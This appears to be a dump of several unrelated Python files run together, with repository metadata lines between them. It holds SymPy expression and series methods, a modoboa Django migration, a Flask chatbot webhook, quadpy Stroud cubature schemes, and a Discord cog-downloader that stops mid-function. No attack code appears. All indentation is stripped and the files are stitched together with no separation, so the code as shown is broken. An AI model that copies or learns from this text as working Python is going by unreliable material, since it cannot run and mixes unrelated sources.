>>> factor(a).is_algebraic_expr()
True
See Also
========
is_rational_function()
References
==========
- http://en.wikipedia.org/wiki/Algebraic_expression
"""
if syms:
syms = set(map(sympify, syms))
else:
syms = self.free_symbols
if syms.intersection(self.free_symbols) == set([]):
# constant algebraic expression
return True
else:
return self._eval_is_algebraic_expr(syms)
###################################################################################
##################### SERIES, LEADING TERM, LIMIT, ORDER METHODS ##################
###################################################################################
def series(self, x=None, x0=0, n=6, dir="+", logx=None):
"""
Series expansion of "self" around ``x = x0`` yielding either terms of
the series one by one (the lazy series given when n=None), else
all the terms at once when n != None.
Returns the series expansion of "self" around the point ``x = x0``
with respect to ``x`` up to ``O((x - x0)**n, x, x0)`` (default n is 6).
If ``x=None`` and ``self`` is univariate, the univariate symbol will
be supplied, otherwise an error will be raised.
>>> from sympy import cos, exp
>>> from sympy.abc import x, y
>>> cos(x).series()
1 - x**2/2 + x**4/24 + O(x**6)
>>> cos(x).series(n=4)
1 - x**2/2 + O(x**4)
>>> cos(x).series(x, x0=1, n=2)
cos(1) - (x - 1)*sin(1) + O((x - 1)**2, (x, 1))
>>> e = cos(x + exp(y))
>>> e.series(y, n=2)
cos(x + 1) - y*sin(x + 1) + O(y**2)
>>> e.series(x, n=2)
cos(exp(y)) - x*sin(exp(y)) + O(x**2)
If ``n=None`` then a generator of the series terms will be returned.
>>> term=cos(x).series(n=None)
>>> [next(term) for i in range(2)]
[1, -x**2/2]
For ``dir=+`` (default) the series is calculated from the right and
for ``dir=-`` the series from the left. For smooth functions this
flag will not alter the results.
>>> abs(x).series(dir="+")
x
>>> abs(x).series(dir="-")
-x
"""
from sympy import collect, Dummy, Order, Rational, Symbol
if x is None:
syms = self.atoms(Symbol)
if not syms:
return self
elif len(syms) > 1:
raise ValueError('x must be given for multivariate functions.')
x = syms.pop()
if not self.has(x):
if n is None:
return (s for s in [self])
else:
return self
if len(dir) != 1 or dir not in '+-':
raise ValueError("Dir must be '+' or '-'")
if x0 in [S.Infinity, S.NegativeInfinity]:
dir = {S.Infinity: '+', S.NegativeInfinity: '-'}[x0]
s = self.subs(x, 1/x).series(x, n=n, dir=dir)
if n is None:
return (si.subs(x, 1/x) for si in s)
return s.subs(x, 1/x)
# use rep to shift origin to x0 and change sign (if dir is negative)
# and undo the process with rep2
if x0 or dir == '-':
if dir == '-':
rep = -x + x0
rep2 = -x
rep2b = x0
else:
rep = x + x0
rep2 = x
rep2b = -x0
s = self.subs(x, rep).series(x, x0=0, n=n, dir='+', logx=logx)
if n is None: # lseries...
return (si.subs(x, rep2 + rep2b) for si in s)
return s.subs(x, rep2 + rep2b)
# from here on it's x0=0 and dir='+' handling
if x.is_positive is x.is_negative is None or x.is_Symbol is not True:
# replace x with an x that has a positive assumption
xpos = Dummy('x', positive=True, finite=True)
rv = self.subs(x, xpos).series(xpos, x0, n, dir, logx=logx)
if n is None:
return (s.subs(xpos, x) for s in rv)
else:
return rv.subs(xpos, x)
if n is not None: # nseries handling
s1 = self._eval_nseries(x, n=n, logx=logx)
o = s1.getO() or S.Zero
if o:
# make sure the requested order is returned
ngot = o.getn()
if ngot > n:
# leave o in its current form (e.g. with x*log(x)) so
# it eats terms properly, then replace it below
if n != 0:
s1 += o.subs(x, x**Rational(n, ngot))
else:
s1 += Order(1, x)
elif ngot < n:
# increase the requested number of terms to get the desired
# number keep increasing (up to 9) until the received order
# is different than the original order and then predict how
# many additional terms are needed
for more in range(1, 9):
s1 = self._eval_nseries(x, n=n + more, logx=logx)
newn = s1.getn()
if newn != ngot:
ndo = n + (n - ngot)*more/(newn - ngot)
s1 = self._eval_nseries(x, n=ndo, logx=logx)
while s1.getn() < n:
s1 = self._eval_nseries(x, n=ndo, logx=logx)
ndo += 1
break
else:
raise ValueError('Could not calculate %s terms for %s'
% (str(n), self))
s1 += Order(x**n, x)
o = s1.getO()
s1 = s1.removeO()
else:
o = Order(x**n, x)
if (s1 + o).removeO() == s1:
o = S.Zero
try:
return collect(s1, x) + o
except NotImplementedError:
return s1 + o
else: # lseries handling
def yield_lseries(s):
"""Return terms of lseries one at a time."""
for si in s:
if not si.is_Add:
yield si
continue
# yield terms 1 at a time if possible
# by increasing order until all the
# terms have been returned
yielded = 0
o = Order(si, x)*x
ndid = 0
ndo = len(si.args)
while 1:
do = (si - yielded + o).removeO()
o *= x
if not do or do.is_Order:
continue
if do.is_Add:
ndid += len(do.args)
else:
ndid += 1
yield do
if ndid == ndo:
break
yielded += do
return yield_lseries(self.removeO()._eval_lseries(x, logx=logx))
def taylor_term(self, n, x, *previous_terms):
"""General method for the taylor term.
        This method is slow, because it differentiates n times. Subclasses can
redefine it to make it faster by using the "previous_terms".
"""
from sympy import Dummy, factorial
x = sympify(x)
_x = Dummy('x')
return self.subs(x, _x).diff(_x, n).subs(_x, x).subs(x, 0) * x**n / factorial(n)
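    # For example, sin(x).taylor_term(3, x) gives -x**3/6 and
    # sin(x).taylor_term(2, x) gives 0, matching the Maclaurin series of sin.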
def lseries(self, x=None, x0=0, dir='+', logx=None):
"""
Wrapper for series yielding an iterator of the terms of the series.
Note: an infinite series will yield an infinite iterator. The following,
        for example, will never terminate. It will just keep printing terms
of the sin(x) series::
for term in sin(x).lseries(x):
print term
The advantage of lseries() over nseries() is that many times you are
just interested in the next term in the series (i.e. the first term for
example), but you don't know how many you should ask for in nseries()
using the "n" parameter.
See also nseries().
"""
return self.series(x, x0, n=None, dir=dir, logx=logx)
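    # A typical pattern is to pull terms one at a time, e.g.
    #   it = sin(x).lseries(x)
    #   next(it)   # x
    #   next(it)   # -x**3/6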
def _eval_lseries(self, x, logx=None):
# default implementation of lseries is using nseries(), and adaptively
# increasing the "n". As you can see, it is not very efficient, because
# we are calculating the series over and over again. Subclasses should
# override this method and implement much more efficient yielding of
# terms.
n = 0
series = self._eval_nseries(x, n=n, logx=logx)
if not series.is_Order:
if series.is_Add:
yield series.removeO()
else:
yield series
return
while series.is_Order:
n += 1
series = self._eval_nseries(x, n=n, logx=logx)
e = series.removeO()
yield e
while 1:
while 1:
n += 1
series = self._eval_nseries(x, n=n, logx=logx).removeO()
if e != series:
break
yield series - e
e = series
def nseries(self, x=None, x0=0, n=6, dir='+', logx=None):
"""
Wrapper to _eval_nseries if assumptions allow, else to series.
If x is given, x0 is 0, dir='+', and self has x, then _eval_nseries is
called. This calculates "n" terms in the innermost expressions and
then builds up the final series just by "cross-multiplying" everything
out.
The optional ``logx`` parameter can be used to replace any log(x) in the
returned series with a symbolic value to avoid evaluating log(x) at 0. A
symbol to use in place of log(x) should be provided.
Advantage -- it's fast, because we don't have to determine how many
terms we need to calculate in advance.
        Disadvantage -- you may end up with fewer terms than you may have
expected, but the O(x**n) term appended will always be correct and
so the result, though perhaps shorter, will also be correct.
If any of those assumptions is not met, this is treated like a
wrapper to series which will try harder to return the correct
number of terms.
See also lseries().
Examples
========
>>> from sympy import sin, log, Symbol
>>> from sympy.abc import x, y
>>> sin(x).nseries(x, 0, 6)
x - x**3/6 + x**5/120 + O(x**6)
>>> log(x+1).nseries(x, 0, 5)
x - x**2/2 + x**3/3 - x**4/4 + O(x**5)
Handling of the ``logx`` parameter --- in the following example the
expansion fails since ``sin`` does not have an asymptotic expansion
at -oo (the limit of log(x) as x approaches 0):
>>> e = sin(log(x))
>>> e.nseries(x, 0, 6)
Traceback (most recent call last):
...
PoleError: ...
...
>>> logx = Symbol('logx')
>>> e.nseries(x, 0, 6, logx=logx)
sin(logx)
In the following example, the expansion works but gives only an Order term
unless the ``logx`` parameter is used:
>>> e = x**y
>>> e.nseries(x, 0, 2)
O(log(x)**2)
>>> e.nseries(x, 0, 2, logx=logx)
exp(logx*y)
"""
if x and not x in self.free_symbols:
return self
if x is None or x0 or dir != '+': # {see XPOS above} or (x.is_positive == x.is_negative == None):
return self.series(x, x0, n, dir)
else:
return self._eval_nseries(x, n=n, logx=logx)
def _eval_nseries(self, x, n, logx):
"""
Return terms of series for self up to O(x**n) at x=0
from the positive direction.
This is a method that should be overridden in subclasses. Users should
never call this method directly (use .nseries() instead), so you don't
have to write docstrings for _eval_nseries().
"""
from sympy.utilities.misc import filldedent
raise NotImplementedError(filldedent("""
The _eval_nseries method should be added to
%s to give terms up to O(x**n) at x=0
from the positive direction so it is available when
nseries calls it.""" % self.func)
)
def limit(self, x, xlim, dir='+'):
""" Compute limit x->xlim.
"""
from sympy.series.limits import limit
return limit(self, x, xlim, dir)
def compute_leading_term(self, x, logx=None):
"""
        as_leading_term is only allowed for results of .series().
This is a wrapper to compute a series first.
"""
from sympy import Dummy, log
from sympy.series.gruntz import calculate_series
if self.removeO() == 0:
return self
if logx is None:
d = Dummy('logx')
s = calculate_series(self, x, d).subs(d, log(x))
else:
s = calculate_series(self, x, logx)
return s.as_leading_term(x)
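    # For example, (sin(x)/x).compute_leading_term(x) returns 1, the leading
    # term of the expansion 1 - x**2/6 + O(x**4).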
@cacheit
def as_leading_term(self, *symbols):
"""
Returns the leading (nonzero) term of the series expansion of self.
The _eval_as_leading_term routines are used to do this, and they must
always return a non-zero value.
Examples
========
>>> from sympy.abc import x
>>> (1 + x + x**2).as_leading_term(x)
1
>>> (1/x**2 + x + x**2).as_leading_term(x)
x**(-2)
"""
from sympy import powsimp
if len(symbols) > 1:
c = self
for x in symbols:
c = c.as_leading_term(x)
return c
elif not symbols:
return self
x = sympify(symbols[0])
if not x.is_Symbol:
raise ValueError('expecting a Symbol but got %s' % x)
if x not in self.free_symbols:
return self
obj = self._eval_as_leading_term(x)
if obj is not None:
return powsimp(obj, deep=True, combine='exp')
raise NotImplementedError('as_leading_term(%s, %s)' % (self, x))
def _eval_as_leading_term(self, x):
return self
def as_coeff_exponent(self, x):
""" ``c*x**e -> c,e`` where x can be any symbolic expression.
"""
from sympy import collect
s = collect(self, x)
c, p = s.as_coeff_mul(x)
if len(p) == 1:
b, e = p[0].as_base_exp()
if b == x:
return c, e
return s, S.Zero
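    # For example, (3*x**2).as_coeff_exponent(x) returns (3, 2); an expression
    # that is not of the form c*x**e, such as x + 1, falls back to (x + 1, 0).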
def leadterm(self, x):
"""
Returns the leading term a*x**b as a tuple (a, b).
Examples
========
>>> from sympy.abc import x
>>> (1+x+x**2).leadterm(x)
(1, 0)
>>> (1/x**2+x+x**2).leadterm(x)
(1, -2)
"""
from sympy import Dummy, log
l = self.as_leading_term(x)
d = Dummy('logx')
if l.has(log(x)):
l = l.subs(log(x), d)
c, e = l.as_coeff_exponent(x)
if x in c.free_symbols:
from sympy.utilities.misc import filldedent
raise ValueError(filldedent("""
cannot compute leadterm(%s, %s). The coefficient
should have been free of x but got %s""" % (self, x, c)))
c = c.subs(d, log(x))
return c, e
def as_coeff_Mul(self, rational=False):
"""Efficiently extract the coefficient of a product. """
return S.One, self
def as_coeff_Add(self):
"""Efficiently extract the coefficient of a summation. """
return S.Zero, self
def fps(self, x=None, x0=0, dir=1, hyper=True, order=4, rational=True,
full=False):
"""
        Compute the formal power series of self.
See the docstring of the :func:`fps` function in sympy.series.formal for
more information.
"""
from sympy.series.formal import fps
return fps(self, x, x0, dir, hyper, order, rational, full)
def fourier_series(self, limits=None):
"""Compute fourier sine/cosine series of self.
See the docstring of the :func:`fourier_series` in sympy.series.fourier
for more information.
"""
from sympy.series.fourier import fourier_series
return fourier_series(self, limits)
###################################################################################
##################### DERIVATIVE, INTEGRAL, FUNCTIONAL METHODS ####################
###################################################################################
def diff(self, *symbols, **assumptions):
new_symbols = list(map(sympify, symbols)) # e.g. x, 2, y, z
assumptions.setdefault("evaluate", True)
return Derivative(self, *new_symbols, **assumptions)
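    # For example, (x**3).diff(x) gives 3*x**2 and (x**3).diff(x, 2) gives 6*x;
    # passing evaluate=False returns an unevaluated Derivative object instead.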
###########################################################################
###################### EXPRESSION EXPANSION METHODS #######################
###########################################################################
# Relevant subclasses should override _eval_expand_hint() methods. See
# the docstring of expand() for more info.
def _eval_expand_complex(self, **hints):
real, imag = self.as_real_imag(**hints)
return real + S.ImaginaryUnit*imag
@staticmethod
def _expand_hint(expr, hint, deep=True, **hints):
"""
Helper for ``expand()``. Recursively calls ``expr._eval_expand_hint()``.
Returns ``(expr, hit)``, where expr is the (possibly) expanded
``expr`` and ``hit`` is ``True`` if ``expr`` was truly expanded and
``False`` otherwise.
"""
hit = False
# XXX: Hack to support non-Basic args
# |
# V
if deep and getattr(expr, 'args', ()) and not expr.is_Atom:
sargs = []
for arg in expr.args:
arg, arghit = Expr._expand_hint(arg, hint, **hints)
hit |= arghit
sargs.append(arg)
if hit:
expr = expr.func(*sargs)
if hasattr(expr, hint):
newexpr = getattr(expr, hint)(**hints)
if newexpr != expr:
return (newexpr, True)
return (expr, hit)
@cacheit
def expand(self, deep=True, modulus=None, power_base=True, power_exp=True,
mul=True, log=True, multinomial=True, basic=True, **hints):
"""
Expand an expression using hints.
See the docstring of the expand() function in sympy.core.function for
more information.
"""
from sympy.simplify.radsimp import fraction
hints.update(power_base=power_base, power_exp=power_exp, mul=mul,
log=log, multinomial=multinomial, basic=basic)
expr = self
if hints.pop('frac', False):
n, d = [a.expand(deep=deep, modulus=modulus, **hints)
for a in fraction(self)]
return n/d
elif hints.pop('denom', False):
n, d = fraction(self)
return n/d.expand(deep=deep, modulus=modulus, **hints)
elif hints.pop('numer', False):
n, d = fraction(self)
return n.expand(deep=deep, modulus=modulus, **hints)/d
# Although the hints are sorted here, an earlier hint may get applied
# at a given node in the expression tree before another because of how
# the hints are applied. e.g. expand(log(x*(y + z))) -> log(x*y +
# x*z) because while applying log at the top level, log and mul are
# applied at the deeper level in the tree so that when the log at the
# upper level gets applied, the mul has already been applied at the
# lower level.
# Additionally, because hints are only applied once, the expression
# may not be expanded all the way. For example, if mul is applied
# before multinomial, x*(x + 1)**2 won't be expanded all the way. For
# now, we just use a special case to make multinomial run before mul,
# so that at least polynomials will be expanded all the way. In the
# future, smarter heuristics should be applied.
# TODO: Smarter heuristics
def _expand_hint_key(hint):
"""Make multinomial come before mul"""
if hint == 'mul':
return 'mulz'
return hint
for hint in sorted(hints.keys(), key=_expand_hint_key):
use_hint = hints[hint]
if use_hint:
hint = '_eval_expand_' + hint
expr, hit = Expr._expand_hint(expr, hint, deep=deep, **hints)
while True:
was = expr
if hints.get('multinomial', False):
expr, _ = Expr._expand_hint(
expr, '_eval_expand_multinomial', deep=deep, **hints)
if hints.get('mul', False):
expr, _ = Expr._expand_hint(
expr, '_eval_expand_mul', deep=deep, **hints)
if hints.get('log', False):
expr, _ = Expr._expand_hint(
expr, '_eval_expand_log', deep=deep, **hints)
if expr == was:
break
if modulus is not None:
modulus = sympify(modulus)
if not modulus.is_Integer or modulus <= 0:
raise ValueError(
"modulus must be a positive integer, got %s" % modulus)
terms = []
for term in Add.make_args(expr):
coeff, tail = term.as_coeff_Mul(rational=True)
coeff %= modulus
if coeff:
terms.append(coeff*tail)
expr = Add(*terms)
return expr
###########################################################################
################### GLOBAL ACTION VERB WRAPPER METHODS ####################
###########################################################################
def integrate(self, *args, **kwargs):
"""See the integrate function in sympy.integrals"""
from sympy.integrals import integrate
return integrate(self, *args, **kwargs)
def simplify(self, ratio=1.7, measure=None):
"""See the simplify function in sympy.simplify"""
from sympy.simplify import simplify
from sympy.core.function import count_ops
measure = measure or count_ops
return simplify(self, ratio, measure)
def nsimplify(self, constants=[], tolerance=None, full=False):
"""See the nsimplify function in sympy.simplify"""
from sympy.simplify import nsimplify
return nsimplify(self, constants, tolerance, full)
def separate(self, deep=False, force=False):
"""See the separate function in sympy.simplify"""
from sympy.core.function import expand_power_base
return expand_power_base(self, deep=deep, force=force)
def collect(self, syms, func=None, evaluate=True, exact=False, distribute_order_term=True):
"""See the collect function in sympy.simplify"""
from sympy.simplify import collect
return collect(self, syms, func, evaluate, exact, distribute_order_term)
def together(self, *args, **kwargs):
"""See the together function in sympy.polys"""
from sympy.polys import together
return together(self, *args, **kwargs)
def apart(self, x=None, **args):
"""See the apart function in sympy.polys"""
from sympy.polys import apart
return apart(self, x, **args)
def ratsimp(self):
"""See the ratsimp function in sympy.simplify"""
from sympy.simplify import ratsimp
return ratsimp(self)
def trigsimp(self, **args):
"""See the trigsimp function in sympy.simplify"""
from sympy.simplify import trigsimp
return trigsimp(self, **args)
def radsimp(self):
"""See the radsimp function in sympy.simplify"""
from sympy.simplify import radsimp
return radsimp(self)
def powsimp(self, deep=False, combine='all'):
"""See the powsimp function in sympy.simplify"""
from sympy.simplify import powsimp
return powsimp(self, deep, combine)
def combsimp(self):
"""See the combsimp function in sympy.simplify"""
from sympy.simplify import combsimp
return combsimp(self)
def factor(self, *gens, **args):
"""See the factor() function in sympy.polys.polytools"""
from sympy.polys import factor
return factor(self, *gens, **args)
def refine(self, assumption=True):
"""See the refine function in sympy.assumptions"""
from sympy.assumptions import refine
return refine(self, assumption)
def cancel(self, *gens, **args):
"""See the cancel function in sympy.polys"""
from sympy.polys import cancel
return cancel(self, *gens, **args)
def invert(self, g, *gens, **args):
"""Return the multiplicative inverse of ``self`` mod ``g``
        where ``self`` (and ``g``) may be symbolic expressions.
See Also
========
sympy.core.numbers.mod_inverse, sympy.polys.polytools.invert
"""
from sympy.polys.polytools import invert
from sympy.core.numbers import mod_inverse
if self.is_number and getattr(g, 'is_number', True):
return mod_inverse(self, g)
return invert(self, g, *gens, **args)
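    # For example, S(2).invert(5) returns 3 (2*3 is 1 mod 5); for symbolic
    # input such as x.invert(x**2 - 1) the polynomial inverse (here x) is
    # computed through sympy.polys.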
def round(self, p=0):
"""Return x rounded to the given decimal place.
        If a complex number would result, apply round to the real
and imaginary components of the number.
Examples
========
>>> from sympy import pi, E, I, S, Add, Mul, Number
>>> S(10.5).round()
11.
>>> pi.round()
3.
>>> pi.round(2)
3.14
>>> (2*pi + E*I).round()
6. + 3.*I
The round method has a chopping effect:
>>> (2*pi + I/10).round()
6.
>>> (pi/10 + 2*I).round()
2.*I
>>> (pi/10 + E*I).round(2)
0.31 + 2.72*I
Notes
=====
Do not confuse the Python builtin function, round, with the
SymPy method of the same name. The former always returns a float
(or raises an error if applied to a complex value) while the
latter returns either a Number or a complex number:
>>> isinstance(round(S(123), -2), Number)
False
>>> isinstance(S(123).round(-2), Number)
True
>>> isinstance((3*I).round(), Mul)
True
>>> isinstance((1 + 3*I).round(), Add)
True
"""
from sympy import Float
x = self
if x.is_number and not x.is_Atom:
xn = x.n(2)
if not pure_complex(xn, or_real=True):
raise TypeError('Expected a number but got %s:' %
getattr(getattr(x,'func', x), '__name__', type(x)))
elif x in (S.NaN, S.Infinity, S.NegativeInfinity, S.ComplexInfinity):
return x
if not x.is_real:
i, r = x.as_real_imag()
return i.round(p) + S.ImaginaryUnit*r.round(p)
if not x:
return x
p = int(p)
precs = [f._prec for f in x.atoms(Float)]
dps = prec_to_dps(max(precs)) if precs else None
mag_first_dig = _mag(x)
allow = digits_needed = mag_first_dig + p
if dps is not None and allow > dps:
allow = dps
mag = Pow(10, p) # magnitude needed to bring digit p to units place
xwas = x
x += 1/(2*mag) # add the half for rounding
i10 = 10*mag*x.n((dps if dps is not None else digits_needed) + 1)
if i10.is_negative:
x = xwas - 1/(2*mag) # should have gone the other way
i10 = 10*mag*x.n((dps if dps is not None else digits_needed) + 1)
rv = -(Integer(-i10)//10)
else:
rv = Integer(i10)//10
q = 1
if p > 0:
q = mag
elif p < 0:
rv /= mag
rv = Rational(rv, q)
if rv.is_Integer:
# use str or else it won't be a float
return Float(str(rv), digits_needed)
else:
if not allow and rv > self:
allow += 1
return Float(rv, allow)
class AtomicExpr(Atom, Expr):
"""
    A parent class for objects which are both atoms and Exprs.
For example: Symbol, Number, Rational, Integer, ...
But not: Add, Mul, Pow, ...
"""
is_number = False
is_Atom = True
__slots__ = []
def _eval_derivative(self, s):
if self == s:
return S.One
return S.Zero
def _eval_is_polynomial(self, syms):
return True
def _eval_is_rational_function(self, syms):
return True
def _eval_is_algebraic_expr(self, syms):
return True
def _eval_nseries(self, x, n, logx):
return self
def _mag(x):
"""Return integer ``i`` such that .1 <= x/10**i < 1
Examples
========
>>> from sympy.core.expr import _mag
>>> from sympy import Float
>>> _mag(Float(.1))
0
>>> _mag(Float(.01))
-1
>>> _mag(Float(1234))
4
"""
from math import log10, ceil, log
from sympy import Float
xpos = abs(x.n())
if not xpos:
return S.Zero
try:
mag_first_dig = int(ceil(log10(xpos)))
except (ValueError, OverflowError):
mag_first_dig = int(ceil(Float(mpf_log(xpos._mpf_, 53))/log(10)))
# check that we aren't off by 1
if (xpos/10**mag_first_dig) >= 1:
assert 1 <= (xpos/10**mag_first_dig) < 10
mag_first_dig += 1
return mag_first_dig
from .mul import Mul
from .add import Add
from .power import Pow
from .function import Derivative, Function
from .mod import Mod
from .exprtools import factor_terms
from .numbers import Integer, Rational
| bsd-3-clause | -4,040,034,916,984,503,000 | 33.72596 | 109 | 0.514558 | false |
modoboa/modoboa | modoboa/relaydomains/migrations/0008_auto_20171123_1653.py | 1 | 1588 | # Generated by Django 1.10.7 on 2017-11-23 15:53
from django.db import migrations
def move_relaydomain_to_transport(apps, schema_editor):
"""Transform relaydomains to transports."""
RelayDomain = apps.get_model("relaydomains", "RelayDomain")
RecipientAccess = apps.get_model("relaydomains", "RecipientAccess")
Transport = apps.get_model("transport", "Transport")
ra_to_create = []
for rd in RelayDomain.objects.select_related("domain", "service"):
next_hop = "[{}]:{}".format(rd.target_host, rd.target_port)
tr = Transport.objects.create(
pattern=rd.domain.name,
service="relay",
next_hop=next_hop,
_settings={
"relay_target_host": rd.target_host,
"relay_target_port": rd.target_port,
"relay_verify_recipients": rd.verify_recipients
}
)
rd.domain.transport = tr
rd.domain.save(update_fields=["transport"])
if not rd.verify_recipients:
continue
ra_to_create.append(
RecipientAccess(
pattern=rd.domain.name, action="reject_unverified_recipient"))
RecipientAccess.objects.bulk_create(ra_to_create)
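# For illustration: a relay domain "example.org" targeting host "192.0.2.1" on
# port 25 (with verify_recipients unset) becomes a Transport row with
# pattern="example.org", service="relay" and next_hop="[192.0.2.1]:25", and no
# RecipientAccess entry is created for it.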
def forward(apps, schema_editor):
"""Empty."""
pass
class Migration(migrations.Migration):
dependencies = [
('relaydomains', '0007_recipientaccess'),
('transport', '0001_initial'),
('admin', '0011_domain_transport'),
]
operations = [
migrations.RunPython(move_relaydomain_to_transport, forward)
]
| isc | -2,182,599,120,591,932,700 | 32.083333 | 78 | 0.611461 | false |
Akash334/bot | app.py | 1 | 2474 | #!/usr/bin/python
# -*- coding: utf-8 -*-
import urllib
import json
import os
import re
from flask import Flask
from flask import request
from flask import make_response
from random import randint
# Flask app should start in global layout
app = Flask(__name__)
@app.route('/webhook', methods=['POST'])
def webhook():
req = request.get_json(silent=True, force=True)
print 'Request:'
print json.dumps(req, indent=4)
res = processRequest(req)
res = json.dumps(res, indent=4)
# print(res)
r = make_response(res)
r.headers['Content-Type'] = 'application/json'
return r
def processRequest(req):
if req.get('result').get('action') != 'yahooWeatherForecast':
return {}
data = "this is the response from webhook"
res = makeWebhookResult(data)
return res
def makeWebhookResult(data):
number=randint(1,15)
charnumber='1'
speech = "This is the response from server" + "and" + str(number)
print(speech)
print("Here is your question!")
message= {
"attachment":{
"type":"template",
"payload":{
"template_type":"generic",
"elements":[{
"title":"Get Real",
"image_url":"https://www.getreal.life/images/qus"+str(number)+".png",
"buttons":[
{
"type":"element_share"
}
]
}
]
}
},
"quick_replies": [
{
"content_type":"text",
"title": "Ask Me",
"payload": "Ask Me"
},
{
"content_type":"text",
"title": "Ask Bot",
"payload": "Ask Bot"
},
{
"content_type":"text",
"title": "Download App",
"payload": "Download App"
},
{
"content_type":"text",
"title": "50 Power Questions",
"payload": "50 Power Questions"
},
{
"content_type":"location"
}
]
}
return {
"speech": speech,
"displayText": speech,
"data": {"facebook": message}
# "contextOut": [],
#"source": "apiai-weather-webhook-sample"
}
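# Request sketch (illustrative; localhost:5000 assumes the default PORT): the
# webhook only builds a Facebook reply when the API.AI payload carries the
# action "yahooWeatherForecast"; any other action gets an empty JSON object.
#   curl -X POST http://localhost:5000/webhook \
#        -H 'Content-Type: application/json' \
#        -d '{"result": {"action": "yahooWeatherForecast"}}'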
if __name__ == '__main__':
port = int(os.getenv('PORT', 5000))
print 'Starting app on port %d' % port
app.run(debug=False, port=port, host='0.0.0.0')
| apache-2.0 | -7,652,880,332,143,322,000 | 22.121495 | 83 | 0.494745 | false |
nschloe/quadpy | src/quadpy/cn/_stroud_1957.py | 1 | 1501 | import numpy as np
from sympy import Rational as frac
from sympy import cos, pi, sin, sqrt
from ..helpers import article, untangle
from ._helpers import CnScheme, _s
_source = article(
authors=["A.H. Stroud"],
title="Remarks on the Disposition of Points in Numerical Integration Formulas",
journal="Mathematical Tables and Other Aids to Computation",
volume="11",
number="60",
month="oct",
year="1957",
pages="257-261",
url="https://doi.org/10.2307/2001945",
)
def stroud_1957_2(n):
r = sqrt(3) / 6
data = [
(1.0, np.array([np.full(n, 2 * r)])),
(+r, _s(n, -1, r)),
(-r, _s(n, +1, r)),
]
points, weights = untangle(data)
points = np.ascontiguousarray(points.T)
return CnScheme("Stroud 1957-2", n, weights, points, 2, _source, 1.511e-14)
def stroud_1957_3(n):
n2 = n // 2 if n % 2 == 0 else (n - 1) // 2
i_range = range(1, 2 * n + 1)
pts = [
[
[sqrt(frac(2, 3)) * cos((2 * k - 1) * i * pi / n) for i in i_range],
[sqrt(frac(2, 3)) * sin((2 * k - 1) * i * pi / n) for i in i_range],
]
for k in range(1, n2 + 1)
]
if n % 2 == 1:
sqrt3pm = np.full(2 * n, 1 / sqrt(3))
sqrt3pm[1::2] *= -1
pts.append(sqrt3pm)
pts = np.vstack(pts).T
data = [(frac(1, 2 * n), pts)]
points, weights = untangle(data)
points = np.ascontiguousarray(points.T)
return CnScheme("Stroud 1957-3", n, weights, points, 3, _source)
| mit | -844,945,079,170,114,800 | 26.796296 | 83 | 0.545636 | false |
logicaloperate/Project-Apollo | cogs/downloader.py | 1 | 6114 | import discord
from discord.ext import commands
from .utils.dataIO import fileIO
from .utils import checks
from .utils.chat_formatting import box
from __main__ import send_cmd_help, set_cog
import os
from subprocess import call, Popen
from distutils.dir_util import copy_tree
import shutil
import asyncio
class Downloader:
"""Cog downloader/installer."""
def __init__(self, bot):
self.bot = bot
self.path = "data/downloader/cogs/"
@commands.group(pass_context=True)
@checks.is_owner()
async def cog(self, ctx):
"""Additional cogs management"""
if ctx.invoked_subcommand is None:
await send_cmd_help(ctx)
@cog.command(name="list")
async def _send_list(self):
"""Lists installable cogs"""
        index = await self.make_index()
        if not index:
            return
        msg = "Available cogs:\n\n"
for cog in index.keys():
if not index[cog]["DISABLED"]:
msg += cog + "\t" + index[cog]["NAME"] + "\n"
await self.bot.say(box(msg)) # Need to deal with over 2000 characters
@cog.command()
async def info(self, cog : str):
"""Shows info about the specified cog"""
cogs = self.list_cogs()
info_file = self.path + cog + "/info.json"
if cog in cogs:
if os.path.isfile(info_file):
data = fileIO(info_file, "load")
msg = "{} by {}\n\n".format(cog, data["AUTHOR"])
msg += data["NAME"] + "\n\n" + data["DESCRIPTION"]
await self.bot.say(box(msg))
else:
await self.bot.say("The specified cog has no info file.")
else:
await self.bot.say("That cog doesn't exist. Use cog list to see the full list.")
@cog.command(hidden=True)
async def search(self, *terms : str):
"""Search installable cogs"""
pass #TO DO
@cog.command(pass_context=True)
async def update(self, ctx):
"""Updates cogs"""
self.update_repo()
await self.bot.say("Downloading updated cogs. Wait 10 seconds...")
        await asyncio.sleep(10) # TO DO: wait for the result instead, without blocking.
downloadable_cogs = self.list_cogs()
all_cogs = [f.replace(".py", "") for f in os.listdir("cogs/") if f.endswith(".py")]
installed_user_cogs = [f for f in all_cogs if f in downloadable_cogs]
for cog in installed_user_cogs:
result = await self.install(cog)
await self.bot.say("Cogs updated. Reload all installed cogs? (yes/no)")
answer = await self.bot.wait_for_message(timeout=15, author=ctx.message.author)
if answer is None:
await self.bot.say("Ok then, you can reload cogs with `{}reload <cog_name>`".format(ctx.prefix))
elif answer.content.lower().strip() in ["yes", "y"]:
for cog in installed_user_cogs:
self.bot.unload_extension("cogs." + cog)
self.bot.load_extension("cogs." + cog)
await self.bot.say("Done.")
else:
await self.bot.say("Ok then, you can reload cogs with `{}reload <cog_name>`".format(ctx.prefix))
@cog.command(name="install", pass_context=True)
async def _install(self, ctx, cog : str):
"""Installs specified cog"""
install_cog = await self.install(cog)
if install_cog:
await self.bot.say("Installation completed. Load it now? (yes/no)")
answer = await self.bot.wait_for_message(timeout=15, author=ctx.message.author)
if answer is None:
await self.bot.say("Ok then, you can load it with `{}load {}`".format(ctx.prefix, cog))
elif answer.content.lower().strip() in ["yes", "y"]:
set_cog("cogs." + cog, True)
self.bot.unload_extension("cogs." + cog)
self.bot.load_extension("cogs." + cog)
await self.bot.say("Done.")
else:
await self.bot.say("Ok then, you can load it with `{}load {}`".format(ctx.prefix, cog))
        elif install_cog is False:
await self.bot.say("Invalid cog. Installation aborted.")
else:
await self.bot.say("That cog doesn't exist. Use cog list to see the full list.")
async def make_index(self):
cogs = self.list_cogs()
index = {}
if not cogs:
await self.bot.say("There are no cogs available for installation.")
return
for cog in cogs:
if os.path.isfile(self.path + cog + "/info.json"):
info = fileIO(self.path + cog + "/info.json", "load")
index[cog] = info
# Sort by alphabetic order?
return index
async def install(self, cog):
cogs = self.list_cogs()
cog = cog.lower()
if not cog in cogs:
return None
files = [f for f in os.listdir(self.path + cog) if os.path.isfile(self.path + cog + "/" + f)] # Listing all files (not dirs) in the cog directory
cog_file = [f for f in files if f.endswith(".py")] #Verifying the presence of a single py file
if len(cog_file) != 1:
return False
cog_file = cog_file[0]
print("Copying {}...".format(cog_file))
shutil.copy(self.path + cog + "/" + cog_file, "cogs/")
cog_data_path = self.path + cog + "/data"
